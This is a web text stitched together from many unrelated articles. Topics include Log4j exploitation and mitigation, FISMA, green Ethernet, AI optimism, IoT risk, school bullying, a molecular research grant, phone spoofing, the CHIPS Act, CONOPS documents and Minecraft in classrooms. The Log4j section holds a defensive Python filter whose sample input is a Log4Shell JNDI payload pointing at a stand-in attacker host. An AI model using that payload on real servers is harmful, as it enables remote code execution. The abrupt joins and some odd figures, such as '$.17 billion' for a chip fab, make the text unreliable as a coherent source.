Within days, an Iranian state-sponsored hacking group named Charming Kitten or APT35 launched multiple Log4j exploit attacks against Israeli government and business sites. New Log4j exploit mutations and variations proliferated quickly, and by the end of 2021, the advanced persistent threat (APT) Aquatic Panda was using Log4Shell exploit tools in an attempt to steal industrial intelligence and military secrets from universities.

Meanwhile, botnets such as Mirai, Elknot, and Gafgyt were leveraging the Log4j vulnerability to compromise IoT devices including IP cameras, smart TVs, network switches, and routers. Given the widespread presence of Log4j in IoT devices, the use of the Log4j CVE to recruit botnets is particularly problematic. With patching efforts likely to drag on, or be neglected entirely, for months or years, cyber criminals will have ample opportunities to recruit vulnerable devices for crypto mining and DDoS attack platforms. Mirai, in particular, remains a perennial threat against victims of all sizes, both directly and when rented to other threat actors to launch attacks of their own.

Other forms of malware have exploited the Log4j vulnerability as well. Even before the end of 2021, the Belgian Defense Ministry discovered such an attack against its network, possibly as part of a ransomware scheme. In early January 2022, Microsoft confirmed that cyber criminals were targeting VMware Horizon server software at organizations including the UK National Health Service (NHS) to install NightSky, a newly developed ransomware strain based on the Log4j exploit. B1txor20, first identified in March 2022 by researchers at Qihoo 360's Network Security Research Lab, deploys backdoors, SOCKS5 proxy, malware downloading, data theft, arbitrary command execution, and rootkit installing functionality.
Using the Log4j exploit, the malware attacks Linux systems on ARM and x64 CPU architectures and uses DNS tunneling to receive instructions from, and exfiltrate data to, the botnet's command and control servers.

The Apache Software Foundation responded quickly to the disclosure of the Log4j CVE by releasing a series of updated versions, and finally publishing a completely secure release, version 2.17.1, on December 17, 2021. However, as cybersecurity professionals know all too well, the availability of a security patch does not equate to actual security. As noted by the Google Security blog soon after the vulnerability was announced, more than 35,000 Java packages were likely affected, with most affected five levels down or more. "These packages will require fixes throughout all parts of the tree, starting from the deepest dependencies first," the company cautioned.

While upgrading or disabling Log4j libraries throughout the organization (including IoT devices and employee-owned laptops and smartphones) is a daunting task, it is an absolutely essential requirement. Beyond this critical task, enterprise cybersecurity teams should also take steps to minimize the risk of a Log4j exploit. A web application firewall should be deployed and configured to filter out unauthorized sources and content, including the JNDI requests used in Log4j RCE attacks, from unknown IP addresses. Similarly, JNDI lookups can be disabled to prevent queries to a malicious LDAP server. Disabling the loading of remote Java objects can also help ensure that malicious code will not be installed into the environment.

Preventing IoT and other devices from being recruited into botnets, often for use in DDoS attacks, has been a key cybersecurity priority since long before the emergence of the Log4j exploit. The Log4j vulnerability greatly increases this risk, especially given the spike in DDoS activity associated with the Ukraine-Russia conflict.
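As a toy illustration of the kind of header filtering a WAF rule performs against JNDI requests, the sketch below flags the literal `${jndi:` lookup form. This is an assumption-laden sketch only: real Log4Shell payloads were heavily obfuscated (nested lookups and the like), so production WAF rules are considerably more elaborate, and patching remains the only reliable fix.

```python
import re

# Toy pattern for the literal form of a JNDI lookup in a request header.
# Real-world payloads used obfuscation this naive check would miss.
JNDI_PATTERN = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)

def looks_suspicious(header_value):
    """Return True if the header contains a literal ${jndi:...} lookup."""
    return bool(JNDI_PATTERN.search(header_value))

print(looks_suspicious("${jndi:ldap://attacker.example/a}"))    # True
print(looks_suspicious("Mozilla/5.0 (an ordinary User-Agent)")) # False
```

Filtering of this kind is defense in depth at best; it buys time while the underlying Log4j libraries are upgraded or have their lookups disabled.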
Often, these attacks use methods such as DDoS amplification and reflection to multiply their impact via open NTP, LDAP, and SNMP services. In response, organizations must redouble their defenses against both botnet recruitment and DDoS attacks. This begins with securing the enterprise network, reducing the attack surface, and maintaining an inventory of internet-exposed IoT assets. Reducing the number of open NTP, LDAP, and SNMP services can thwart DDoS amplification and reflection tactics. Sluggish network performance can signal an active botnet infection and should trigger a rapid response by SecOps teams.

A10 Networks offers advanced cybersecurity solutions to support a Zero Trust strategy to help businesses protect their networks and data. These solutions include A10's modern DDoS protection solution, Zero-day Automated Protection (ZAP), which scrubs attack traffic quickly and effectively using multi-level adaptive mitigation policies and ML-powered ZAPR (zero-day attack pattern recognition). By monitoring more than 15 million unique DDoS weapon sources around the globe over the last six months, we've curated detailed insights into the origins of DDoS attacks and how to protect against them.
The Federal Information Security Management Act (FISMA) is a federal law that requires federal agencies and state agencies administering federal programs to develop, document, and implement an information security and protection program that effectively manages risk. The main steps to achieve FISMA compliance are:

1. Creating a comprehensive plan to maintain the safety and security of data.
2. Designating appropriate officials to supervise and manage the plan.
3. Performing extensive reviews of the organization's security plan regularly.
4. Authorizing the processing of essential and relevant information before starting operations.
With enterprises scrambling to find ways to cut energy costs, one less-obvious way may come in the form of Ethernet, that venerable, ubiquitous networking technology. While already pervasive throughout the enterprise, Ethernet is continuing its march forward with new initiatives that could mean far faster connectivity for all network users while still being "green," with greatly reduced power requirements.

"In a standard data network … you're not worried about power savings," Brad Booth, president of the Ethernet Alliance industry association, told InternetNews.com. "Pre-2008, we didn't care how much power we used as long as we were able to communicate the data."

But with today's greater focus on power savings, networking vendors are caring how much power everything uses. That's where an innovative use of an existing Ethernet standard comes into play. As part of a student white paper challenge sponsored by the Ethernet Alliance, University of South Florida student Francisco Blanquicet came up with the concept of using the pause cycle in Ethernet to turn data flow on and off, thereby saving power.

"Originally, pause flow control was set up to prevent switches from swamping end nodes," Booth said. "If you have a server or a desktop and it can't handle the amount of data coming into it, Ethernet can pause the flow. When that standard was written people started using it, but then found it didn't work with certain types of traffic very effectively."

Booth described the pause flow control approach for reducing power as an interesting use of an existing technology. Since pause flow control is already part of the Ethernet standard, it can be readily implemented by equipment vendors. The approach could result in a 10 to 15 percent reduction in power.

To drive even greater power reduction for Ethernet, the backers of the networking technology are also busy undertaking a new standards effort, Energy Efficient Ethernet.
The goal of Energy Efficient Ethernet is to reduce Ethernet power consumption by 50 percent or more. "One of the things they're looking at is to actually shut down and literally, physically turn off the physical layer device for a period of time and allow the device to take the line quiet," Booth said. "Then bring it up for a refresh every once in a while. By refreshing intermittently, it allows you to wake up quicker."

Additionally, Booth said Ethernet's supporters also examined reducing speeds from 10-gigabit Ethernet (10GbE) to 1GbE based on network demand, though the results proved less than promising. "What was discovered is that shifting speed actually took so long that you would notice the impact on your network and you could potentially lose packets," he added.

10GbE itself also continues to evolve. At Interop this year, the Ethernet Alliance is demonstrating how 10GBASE-T can be transmitted over Cat6a cabling to a distance of 100 meters, nearly double the technology's 55-meter transmission limit a year ago.

While 10GbE is currently the top speed for Ethernet, the race has already begun for 40GbE and 100GbE speeds, through the IEEE High Speed Ethernet effort, an initiative that Booth said had been incubated by the Ethernet Alliance. Those pushes mark only some of the most visible efforts by the Ethernet Alliance, which spends much of its time between IEEE meetings building consensus.

"The big thing with the IEEE is building consensus, and the Ethernet Alliance is supporting that effort, making sure that consensus building is happening," Booth said. He added that Ethernet Alliance members are already talking about showing 40/100 GbE equipment in 2009.

With Ethernet getting greener and faster, there are still areas that may need improvement, however. "Ethernet is a prevalent technology and it is still spreading its wings into new areas," Booth said.
“We have to sit down and honestly say to ourselves where can we improve the technology and make it better for next generation of datacenter and the Internet in general.”
Is AI the technology we need to save the world?

It is no secret that the world is changing drastically for good and bad, and we need to think outside the box to move towards building a sustainable future for ourselves. We are part of an era wherein everything revolves around data. There is no major industry that does not perform functions using data-trained models or has not been affected by artificial intelligence solutions. This has especially been the case in the last couple of years: since the outbreak of the COVID-19 crisis, data collection and analysis have gained a lot of importance due to the accelerated implementation and adoption of robust IoT solutions and super-fast computer processing.

Artificial intelligence (AI) refers to the ability of machines to collect and interpret data and act upon it intelligently, making well-informed decisions and carrying out tasks based on these data points. AI-based solutions are truly transformative, ones that will dramatically alter people's lives in unimaginable ways.

Whether we accept it or not, artificial intelligence solutions are becoming an integral part of our everyday lives. They are present everywhere, be it workplaces, homes, or cars. AI-based solutions have the potential to influence our everyday decisions, like the choice of TV shows and movies, based on our consumption patterns. Businesses use these solutions to target ads based on consumers' interests, search history, and more. People are more connected than ever before with the help of these solutions. Whether we like it or not, AI solutions are everywhere.

Can AI help with climate change?

Climate change is a serious concern, but it takes a high level of data analysis to forecast and predict the effects of climate change, and further to forecast the implications of our actions to stop and adapt to it.
Today, we have a huge amount of data points available, but we do not have the appropriate computing power and processors to make sense of these data points to handle climate change issues. This high level of analysis is possible with the help of artificial intelligence solutions. Moreover, AI-based solutions might be the best we have to combat and adapt to the effects of climate change. AI-based solutions can analyze huge amounts of data and can forecast predictions. AI is not just helping with the issues of climate change; AI-based solutions are also helping to monitor and predict everything from glacier retreat to commercial waste management. With constant advancements and innovations, AI-based technologies will help across industries to tackle such changes.

Following are some of the reasons why AI is going to change the world in the coming years:

- AI is everywhere: We knowingly or unknowingly use AI-based solutions in the smallest of daily activities: using Alexa for weather reports, using facial recognition technology to unlock our phones, using credit cards, and so on. These day-to-day activities are underpinned by AI and data. AI is deeply embedded in our everyday lives and is transforming industries. The impact of AI-based solutions is largely felt across industries, especially after the outbreak of the global pandemic. AI systems are outperforming human experts.
- AI will help us become more human: Machines are becoming more advanced and intelligent; they are able to carry out more complex tasks, making way for rising automation across industries. With this increase in automation, there are relevant concerns about the impact on human jobs. No doubt, automation will lead to changes in job roles, but it will also create new job opportunities based on the unique human capabilities of creativity and empathy. AI will make our working lives better.
- AI will become more affordable: Earlier, adopting AI-based solutions required expensive technology and a huge team of in-house experts; that's no longer the case. Like other technology solutions, AI-based solutions are readily available to organisations of all sizes. One can partner with custom AI development companies and get access to the best solutions and experts to consult with.
- AI is fuelling other tech solutions and trends: Now that we know AI is embedded in the smallest activities of our day-to-day lives, we can agree that it is going to change the way the world operates. AI is becoming the foundation of other technology solutions and innovations. Without AI, the tech industry wouldn't have solutions like virtual reality, chatbots, autonomous vehicles, facial recognition, and robotics. Any new transformative technology or breakthrough is somewhere aligned with AI's capabilities.

Empowering researchers and scientists to build a more sustainable future

With the help of AI-based solutions and other advancing technologies and innovations, we are empowering researchers and scientists to build a more sustainable future for us. It is just a matter of time as we continue to develop new applications and solutions, deploy them across industries, and tackle the challenges in various fields. There is a lot of speculation that AI might also destroy whatever we humans have built to this date. We don't know yet whether AI will be part of the coming era of human existence or if it will end up destroying everything. What is clear is that AI-based solutions are right now making lives easier for us, and if the future bears little resemblance to what we inhabit today, it is going to be glorious for us!
Experts largely agree that the IoT brings with it significant risks in terms of security and privacy, but will the advantages of convenience outweigh them for consumers?

Not according to an admittedly less-than-scientific, but nevertheless interesting, poll of "technologists, scholars, practitioners, strategic thinkers and other leaders", conducted by the Pew Research Center and Elon University's Imagining the Internet Center. In July and August last year, the researchers asked how attacks and ransomware concerns would influence the spread of connectivity: 15 percent of the 1,201 respondents said significant numbers of people would disconnect, while 85 percent said most people would "move more deeply into connected life".

Why? Strikingly, many of the survey's respondents pointed to the convenience that comes with connectivity, and the so-called "optimism bias" that leads people to think bad things will happen to other people, but not to them.

"Unless we have a disaster that triggers a major shift in usage, the convenience and benefits of connectivity will continue to attract users," read one comment from MIT senior research scientist David Clark. "Evidence suggests that people value convenience today over possible future negative outcomes."

Tesla software engineer David Wuertele, meanwhile, told the researchers that people's desire "for these magic devices is so strong that they will sign away their own personal data as well as their families' (and sometimes their friends') data to get the goodies". Mimecast chief scientist Nathaniel Borenstein chipped in that "there are few examples in human history of people making rational decisions about privacy or security".

What's the risk in IoT?

How serious are the risks of the internet of things, though? And in particular, are we likely to see the kind of catastrophic events that would grab the attention of regular consumers?
The key here, according to the security experts to whom Internet of Business has spoken, is the scale at which vulnerable devices are deployed.

"Even a small security hole that may be exploitable only under very narrow conditions could become fatal in today's IoT world if a certain device is deployed a million times," says Steffen Wendzel, professor for information security and networks at the Worms University of Applied Sciences in Germany.

"Infrastructures are becoming more and more connected due to convenience and… we've seen every time there is excessive connectivity, then there comes the risk represented in different forms of cyberattacks," adds David Barzilai, chairman and co-founder of the Israeli automotive security firm Karamba Security. "The motivation today is unfortunately not just kids trying to be smart. We're seeing organised crime or terrorist organisations or states. The temptation or the reward for that is high. What you could gain after such attacks is [increasing] because of the sheer scale of one attack."

Barzilai raises the notorious example of Chrysler's mass vehicle recall back in 2015, which followed the revelation by two security researchers that the Jeep Cherokee could be remotely commandeered, to potentially lethal effect.

"There was only one security bug that was exploited by the white-hat hackers in that Cherokee. The recall was for 1.4 million cars. All of them had the very same single security bug," he says. "Each car today has hundreds or thousands of security bugs and we know it… The same bug repeats itself in hundreds or thousands or more of cars, so an attacker could affect the lives of so many people with one attack. This is just cars. We could talk about connected medical devices and connected infrastructure. It's a big deal."

A matter of convenience

But what about that convenience, along with the demonstrable benefits of the IoT?
As Wendzel notes, “self-driving cars could ultimately make driving safer, prevent several deaths and provide drivers with the chance to do something else while driving”. However, the professor adds that consumer enthusiasm for connected devices can sometimes be overstated.

“The big breakthrough of ‘smart homes’ was expected several times to become reality in the last decade,” he points out. “However, it is still ongoing and – at least in Germany – quite slowly. Besides costs, customers see no strong gain and promised energy-saving does not always work as expected.”

Here’s the thing: when it comes to the IoT, the pull may not be as important as the push. Barzilai suggests that convenience is a “major enabler” for connected cars, but efficiency – for suppliers, not consumers – remains a bigger driver in the wider IoT industry.

“I think the internet of things is at least now not something that is consumed by the end user, like a smart home or something like that,” he says. “But we do see a push created by vendors for [deploying in aid of] support. The escalator vendor is now selling escalators connected to the internet in order to get alerts for maintenance and do remote software upgrades.”

Could we disconnect in future?

There’s clearly a world of difference between consumers letting newly-connected devices into their lives, and the builders of the public environment adding connectivity to their infrastructure. Many respondents to the Pew research seem to have conflated the two phenomena under the banner of connectivity, making it difficult to tell whether they saw widespread enthusiasm for smartphones translating into acceptance for new-fangled IoT devices.

But that said, some did note that IoT acceptance was likely to become involuntary. As Erik Johnston, associate professor and director of the Center for Policy Informatics at Arizona State University, put it: “Trying to disconnect in the future will be increasingly difficult.
Only those who are either very privileged or unprivileged will find themselves in a situation where the majority of their lives are not connected in a meaningful way… It would be impossible to opt out of public surveillance, the TSA [Transportation Security Administration] and many other essentials of navigating a normal life.” And in the words of spreadsheet pioneer Bob Frankston, another Pew respondent: “A significant number will have the illusion of being disconnected [when they actually are not].” The optimism bias may be a real phenomenon, but that all-important risk-versus-convenience assessment may not end up being down to consumers after all.
Attention Governors, State Education Directors, Superintendents, School Boards, Principals and community leaders:

What is Brain Drain?

Most often ‘brain drain’ is defined as ‘the human capital flight’, or the loss of skilled intellectual and technical labor through the movement of such labor to more favorable geographic, economic or professional environments. But a more serious and more damaging ‘brain drain’ is taking place within our schools on a daily basis, and the White House Conference on Bullying Prevention last week validates that this more serious ‘brain drain’ is taking place.

According to The White House Blog: Every day, thousands of kids, teens, and young adults around the country are bullied. Estimates are that nearly one-third of all school aged children are bullied each school year – upwards of 13 million students. Students involved in bullying are more likely to have challenges in school, to abuse drugs and alcohol, and to have health and mental health issues. If we fail to address bullying we put ourselves at a disadvantage for increasing academic achievement and making sure all of our students are college and career ready.

‘Brain drain’ in our schools is a serious problem that affects our nation’s future and affects our communities, who must pick up the pieces. Lessons learned show there are ‘no brainer’ solutions for helping to eliminate ‘brain drain’ in schools, but school leaders and community leaders must be willing to get rid of their status quo beliefs and take advantage of innovative solutions….are you willing?
A team formed by IBM Research scientist Dr. Leo Gross, University of Regensburg professor Dr. Jascha Repp, and University of Santiago de Compostela professor Dr. Diego Peña Gil has received a European Research Council (ERC) Synergy Grant for their project “Single Molecular Devices by Atom Manipulation” (MolDAM). The ERC will fund this interdisciplinary project with more than €9 million over six years.

Molecules are nature’s fundamental building blocks for life, having countless different roles, properties and functionalities. In MolDAM, a team formed by physicists and chemists will aim to control single molecules and chemical bonds at will. Simply put, the main goal of MolDAM is to realize physicist and Nobel laureate Richard Feynman’s vision: building up matter from individual atoms the way we want, by controlling chemical reactions with the tip of a scanning probe microscope. This way, the team wants not only to resolve chemical reactions with unprecedented resolution in space and time, but also to discover completely new reactions.

With these funds, novel molecules and nanostructures will be designed and built with atomic precision using atom manipulation with scanning probe microscopes. Using ultrafast light pulses, MolDAM aims at obtaining “movies” of how a bond is formed, observing in time how atoms rearrange in the course of a chemical reaction. Controlling single-electron charges within the custom-built structures will enable the investigation of electron transfer, carrier generation and recombination, and redox reactions at the molecular level. In other words, the team will catch single molecules in action. Building and studying atomically defined molecular devices on their intrinsic length and time scales will advance our fundamental understanding of the molecular world, with impact on the fields of chemical synthesis, light harvesting, molecular machinery and computing.
How Does Phone Spoofing Work?

Call spoofing is when the caller deliberately sends false information to change the caller ID. Most spoofing is done using a VoIP (Voice over Internet Protocol) service or IP phone that uses VoIP to transmit calls over the internet. VoIP users can usually choose their preferred number or name to be displayed on the caller ID when they set up their account. Some providers even offer spoofing services that work like a prepaid calling card. Customers pay for a PIN code to use when calling their provider, allowing them to select both the destination number they want to call, as well as the number they want to appear on the recipient’s caller ID.

What Are The Dangers of Phone Spoofing?

Scammers often use spoofing to try to trick people into handing over money, personal information, or both. They may pretend to be calling from a bank, a charity, or even a contest, offering a phony prize. These “vishing” attacks (or “voice phishing”) are quite common, and often target older people who are not as aware of this threat. For instance, one common scam appears to come from the IRS. The caller tries to scare the receiver into thinking that they owe money for back taxes, or need to send over sensitive financial information right away. Another common scam is fake tech support, where the caller claims to be from a recognizable company, like Microsoft, claiming there is a problem with your computer and they need remote access to fix it.

There are also “SMiShing” attacks, or phishing via text message, in which you may receive a message that appears to come from a reputable person or company, encouraging you to click on a link. But once you do, it can download malware onto your device, sign you up for a premium service, or even steal your credentials for your online accounts.

Why Is Spoofing So Prevalent?
The convenience of sending digital voice signals over the internet has led to an explosion of spam and robocalls over the past few years. In fact, according to Hiya, a company that offers anti-spam phone solutions, spam calls grew to 54.6 billion in 2019, a 108% increase over the previous year. Since robocalls use a computerized autodialer to deliver pre-recorded messages, marketers and scammers can place many more calls than a live person ever could, often employing tricks such as making the call appear to come from the recipient’s own area code. This increases the chance that the recipient will answer the call, thinking it is from a local friend or business. And because many of these calls are from scammers or shady marketing groups, just registering your number on the FTC’s official “National Do Not Call Registry” does little to help. That’s because only real companies that follow the law respect the registry.

What Can I Do To Stop Spoofing Calls?

To really cut back on these calls, the first thing you should do is check to see if your phone carrier has a service or app that helps identify and filter out spam calls. For instance, both AT&T and Verizon have apps that provide spam screening or fraud warnings, although they may cost you extra each month. T-Mobile warns customers if a call is likely a scam when it appears on your phone screen, and you can sign up for a scam blocking service for free. There are also third-party apps such as RoboKiller and Nomorobo that you can download to help you screen calls, but you should be aware that you will be sharing private data with them.

Other Tips For Dealing With Unwanted Calls

- After registering for the Do Not Call Registry and checking out your carrier’s options, be very cautious when it comes to sharing your contact information. If an online form asks for your phone number but does not need it, leave that field blank. Also, avoid listing your personal phone number on your social media profiles.
- If you receive a call from an unrecognized number, do not answer it. You can always return the call later to see if it was a real person or company. If it was a scam call, you can choose to block the number in your phone, but that too can be frustrating since scammers change their numbers so often.
- You can report unwanted calls to the FTC.
- Be wary of entering contests and sweepstakes online, since they often share data with other companies.
- Stay up-to-date on the latest scams, so you know what to look out for, and install mobile security on your phone to help protect you from malware and other threats.
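The screening that carrier and third-party apps perform can be illustrated with a small sketch. This is a hypothetical blocklist-plus-heuristics filter, not any vendor's actual logic: the spam numbers and the "neighbor spoofing" rule (same area code and prefix as your own number) are illustrative assumptions.

```python
import re

# Hypothetical entries -- real apps consult large, frequently updated databases.
KNOWN_SPAM = {"+15550100123", "+15550100456"}

def screen_call(caller_id: str, own_number: str) -> str:
    """Classify an incoming caller ID as 'block', 'warn', or 'allow'."""
    digits = re.sub(r"\D", "", caller_id)   # keep digits only
    own = re.sub(r"\D", "", own_number)

    # Exact match against a spam blocklist.
    if "+" + digits in KNOWN_SPAM:
        return "block"
    # "Neighbor spoofing": same area code and prefix as your own number,
    # a common trick to make the call look local.
    if len(digits) == 11 and len(own) == 11 and digits[:7] == own[:7] and digits != own:
        return "warn"
    return "allow"

print(screen_call("+1 (555) 010-0123", "+1 (555) 867-5309"))  # block
print(screen_call("+1 (555) 867-5000", "+1 (555) 867-5309"))  # warn
print(screen_call("+1 (555) 123-4567", "+1 (555) 867-5309"))  # allow
```

A real screening service would also weigh call frequency, user reports, and carrier-side authentication signals, but the block/warn/allow decision shape is the same.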
Two former senior defense and intelligence leaders lay out the case for Congressional action to help the U.S. semiconductor industry. After 9/11, the country moved swiftly to secure cockpits and improve airport security. Today, we must act with similar urgency to build up America’s ability to design and produce new microchips—starting by passing the CHIPS Act. Despite America’s impressive semiconductor design and innovation advantages, the U.S. is falling behind in advanced semiconductor production. The U.S. makes just 12 percent of the world's chips while 80 percent come from the Indo-Pacific region. Moreover, global demand is outstripping supply, with chip sales rising up to 17 percent from 2019 to 2021. The world’s semiconductor-makers have responded by making chips at maximum capacity, but the realities of chip production have made those efforts insufficient. In 2021 alone, the chip supply shortage cost the U.S. economy $240 billion. The high-tech weapons and systems that help give the United States its superiority across every domain of warfare depend on chips. The Javelin anti-tank missile alone, for example, contains more than 200 microelectronic components. This all creates irresponsible risks for U.S. national security and for American warfighters. We should know: one of us just stepped down as the Deputy Assistant Secretary of Defense for Industrial Policy; the other led the U.S. intelligence community’s assessments on foreign investments in U.S. technology. The answer is to build more production capacity in the United States, but that’s no quick fix. New semiconductor fabrication plants are technically complex and require extensive capital to fund. McKinsey and Company estimates that building a state-of-the-art fab requires more than three years and $10 billion. Even less-advanced factories come with a hefty price tag: about $5 billion for a 5nm chip fab and $.17 billion for a 10nm one. 
The CHIPS Act would reduce US reliance on foreign-made semiconductors. The Atlantic Council estimates that with the CHIPS Act, by 2030, US semiconductor manufacturing would account for about 14 percent of global production; without it, the U.S. would drop to ten percent. But that four-percentage-point difference is far greater than the numbers would imply, because what the U.S. would be producing is the most advanced chips. To do this, the CHIPS Act provides roughly $52 billion to encourage domestic semiconductor manufacturing. This investment would provide the necessary down-payment for avoiding technology dependence on foreign chipmakers, curtail inflation of semiconductor prices, and enable a competitive market in the U.S. that takes advantage of our know-how in designing and producing the most advanced chips, especially those at 14 nanometers and below.

Critics argue that the CHIPS Act would distort the market. It might. Lawmakers should strongly consider how to incentivize local development across the segments of the market and avoid picking corporate winners. America’s economic competitiveness has always come from its capacity to harness the power of the market. But the global semiconductor market is already distorted by a network of foreign competitors who undermine the U.S. ability to compete on production cost – by subsidizing nearly 30 percent of semiconductor revenues. Beijing has already provided more than $160 billion in subsidies to Chinese chip manufacturers. Taiwan's chipmakers are investing $120 billion; the Republic of Korea is giving up to $450 billion in tax credits over the next 10 years; and Japan’s subsidies are designed to enable it to triple its chip production by 2030. The European Union has also committed $48 billion to chip production in order to reduce dependency on foreign firms.
The CHIPS Act, which at press time was advancing through the Senate and awaiting action by the House, will renew a critical area of American strength, while also creating new opportunities with our allies. Japan, South Korea, Germany, and Taiwan all produce some of the world’s most advanced chips. Dutch lithography technology is currently key to every nation’s production of the smallest-die chips. The push to build global semiconductor resilience is accelerating U.S. efforts to deepen its defense industrial cooperation with our allies and partners. Together with our allies, we can strengthen supply chain resilience, advance our sources of economic strength, and ensure our warfighters have reliable advantages on the battlefield.

Jonathan Panikoff is a Senior Fellow at the Atlantic Council’s Geoeconomics Center and the former Director of the Investment Security Group at the Office of the Director of National Intelligence. Jesse Salazar recently served in the Biden Administration as the Deputy Assistant Secretary of Defense for Industrial Policy.
Concept of Operations (CONOPS) - The Missing Link of Program-Level Cybersecurity & Data Protection Guidance

A Concept of Operations (CONOPS) document provides user-oriented guidance that describes crucial context from an integrated systems point of view (e.g., mission, operational objectives and overall expectations), without being overly technical or formal. A CONOPS is meant to:
- Benefit stakeholders by establishing a baseline “operational concept” that provides a conceptual, clearly-understood view for everyone involved in the scope of operations described by the CONOPS.
- Record design constraints, the rationale for those constraints and the range of acceptable solution strategies to accomplish the mission and any stated objectives.
- Contain a conceptual view that illustrates the top-level functionality in the proposed process or system.

A CONOPS is not a set of policies, standards or procedures, but it does complement and support those documents. A CONOPS straddles the territory between an organization's centrally-managed policies/standards and its decentralized, stakeholder-executed procedures, where a CONOPS serves as expert-level guidance that is meant to run a specific capability or function within an organization's cybersecurity department. An organization's Subject Matter Experts (SMEs) are expected to use a CONOPS as a tool to help communicate user needs and system characteristics to developers, integrators, sponsors, funding decision makers and other stakeholders.

Several ComplianceForge documents are essentially CONOPS documents, where those CONOPS-like documents are (1) more conceptual than procedures and (2) focused on providing program-level guidance to define and mature a specific capability that is called for by policies and standards (e.g., operate a "risk management program").
Examples of ComplianceForge products that provide program-level guidance to define a function-specific concept of operations include: - Risk management (e.g., Risk Management Program (RMP)) - Vulnerability management (e.g., Vulnerability & Patch Management Program (VPMP)) - Incident response (e.g., Integrated Incident Response Program (IIRP)) - Business Continuity / Disaster Recovery (e.g., Continuity of Operations Plan (COOP)) - Secure engineering practices (e.g., Security & Privacy By Design (SPBD)) - Pre-production testing (e.g., Information Assurance Program (IAP)) - Supply Chain Risk Management (SCRM) (e.g., Third-Party Security Management (TPSM)) - Configuration management (e.g., Secure Baseline Configurations (SBC))
The fundamental question we should be asking children as they grow up is no longer what they want to “be” but rather what they would like to “do.” What problems are they passionate about solving, and what are the skills that will enable them to achieve their goals? Traditional education models are at odds with this type of thinking, however, as they are still built largely around the mythology of finite goals. The concept that there are clear milestones and an eventual finishing line to learning was never ideal, but it is even more woefully inadequate in a technology-enabled world. To thrive in volatile environments, we must embrace life-long learning.

One solution that educators are deploying to bridge that gap between traditional learning delivery systems and newer workflows and expectations is the use of gamified learning platforms. Gamified learning is very helpful in cultivating a mindset where problem-solving becomes a fun activity, and failure is seen as a stepping stone. If, like myself, you’re old enough to have earned your gaming chops alongside Mario or Sonic, you’re unlikely to recall exactly how many times you “died” along the way, or exactly how you adapted your strategy incrementally after each setback. The moments when you beat that boss and rescue the princess, however, tend to stick with you.

Vice President of Education at Microsoft Anthony Salcito spoke with me during this week’s Education Exchange conference (E2) in Paris, which brought together a diverse group of educators from all over the world to discuss how best to leverage technology such as Minecraft to deliver better learning outcomes for students. For those unfamiliar with Minecraft, it is a game that allows players to construct 3D worlds out of textured cubes, but players must explore and gather resources in order to do so. There are individual and collaborative multi-player modes. It was originally published in 2011, before its developer, Mojang, was acquired by Microsoft in 2014.
To date it has sold over 121 million copies, making it second only to Tetris in terms of popularity. Microsoft has since developed Minecraft: Education Edition, which is used in schools and has additional pedagogical tools and functionalities.

Learning by teaching

“When you find something joyful, you will discover that fully. I learn more from students than the people actually coding the game in Redmond,” says Meenoo Rami, Educator Advocate at Minecraft and Microsoft. Since many students are already familiar with the platform from playing the game at home, educators are able to draw upon the students’ own expertise and to focus on the learning aspects rather than covering the mechanics of the technology itself. It also prompts situations where “expert” users mentor younger learners and also help teachers who might not be as familiar with the platform as their students, further fostering a collaborative ethos in the classroom.

Building modular skillsets

Another advantage of Minecraft is that it helps to encourage a modular approach to building skillsets. When each new problem demands you to find and leverage different resources, materials and collaborations, you start to envisage those as pieces of a puzzle, for which there are multiple possible solutions. This is why LEGO and Minecraft have proven so popular and effective in those contexts, as their core design is in itself modular.

A recently published survey polled teachers across 11 countries and four continents. It revealed that students’ decision-making and communication ability were positively impacted by the time they spent playing Minecraft, and that it cultivated a creative problem-solving mindset. In Minecraft, starting over represents a new opportunity rather than a regrettable ordeal. Remaining calm and focusing on solving a problem is a skill that is likely to serve students well throughout their academic and professional careers.
Surveyed teachers reported that students using the platform were confident interacting freely during lessons, exercising agency often without prompts from teachers and overcoming challenges as teams. They found that working through the game made it easier to bridge accessibility issues, in that students with different learning styles and abilities were more easily able to find common ground, and to share what they discover in multiple formats. They also felt comfortable experimenting, and perceived failure as part of the creative learning process. This resilience and growth mindset is very much recognized as a key desirable trait by employers, especially in innovative industries such as technology.

Paradoxically, however, the more teachers and students utilized the Minecraft platform to deliver pedagogical content and improve learning outcomes, the less emphasis they placed on the game itself. As is often the case with successful technology solutions, the measure of their success hinges on how invisible they become, allowing the content to shine through.

Social emotional learning

Considering how videogaming is often perceived as being socially isolating, it is somewhat surprising that one of the areas that was most dramatically improved by engagement with the Minecraft for Education platform was social and emotional learning (SEL). A study conducted by Microsoft has shown that an increasing number of schools are embracing SEL, an approach that builds skills and competencies that help students be successful in school, work, and life. In the context of K–12 education, SEL is the process through which students acquire and effectively apply the knowledge, attitudes and skills necessary to understand and manage emotions, set and achieve positive goals, feel and show empathy for others, establish and maintain positive relationships, and make responsible decisions.
SEL initiatives thrive when woven into subjects across the curriculum throughout the traditional school day, tackling real-world problems, or at the very least problems that “feel” real to students. Research has shown that students exposed to SEL are better equipped to manage themselves and exhibit agency over their own academic experience, have a greater understanding of the perspectives of others and a better ability to relate effectively to them, and are able to make sound choices about personal and social decisions.

Social emotional learning comes to life when knowledge is applied to solving relevant problems, whether in the context of real-world scenarios or disguised as play. One of the best examples that Rami showed me was how students needed to leverage basic chemistry to obtain materials such as latex. This in turn can be used to make balloons. And those balloons can be attached to the whimsical pigs that populate the game (once you manage to catch them, that is). I have a feeling that applying chemistry to make pigs fly is the sort of thing that might make a student remember what the chemical components of latex are far better than memorizing the periodic table ever could. I know the image of those floating square pigs stuck in my mind.

Comprehensive SEL goals include developmental benchmarks across five key social and emotional competency domains, encompassing self-awareness, self-management, social awareness, relationship skills and responsible decision-making skills.

More than just a videogame

“Minecraft creates opportunities for transformational learning experiences,” says Dr. Michelle Zimmerman, an educational researcher who works at Renton Prep Christian School, an institution which makes extensive use of the platform in delivering its curriculum.
Educators have the opportunity to help students develop empathy through gaming and imagine how they’d like to be treated, talk through scenarios in gaming and in their personal lives, and discuss how they would do something differently (or have wanted to be treated differently), then practice those skills. Technology doesn’t impede our ability to build relationships; conversely, with regard to gaming in the classroom, it can serve to further bolster them. We know that human connection can be powerful in many settings and environments. “Gaming is no exception,” Zimmerman concludes.

